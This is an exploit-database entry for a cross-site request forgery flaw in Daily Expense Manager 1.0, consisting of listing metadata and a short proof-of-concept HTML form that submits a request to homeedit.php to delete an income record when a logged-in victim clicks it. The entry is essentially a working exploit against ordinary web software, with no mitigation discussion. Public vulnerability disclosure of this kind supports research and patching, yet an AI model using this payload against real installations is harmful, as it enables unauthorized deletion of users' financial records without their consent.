Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)

Author: Mr Winst0n
type: webapps
platform: php
port: 80.0
date_added: 2019-08-08  
date_updated: 2019-08-08  
verified: 0  
codes:   
tags: Cross-Site Request Forgery (CSRF)  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comexpense.zip  

raw file: 47213.txt  
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<html>
<body>
	<form action="http://server/homeedit.php?delincome=778" method="post">
		<input type="submit" value="Click!" />
	</form>
</body>
</html>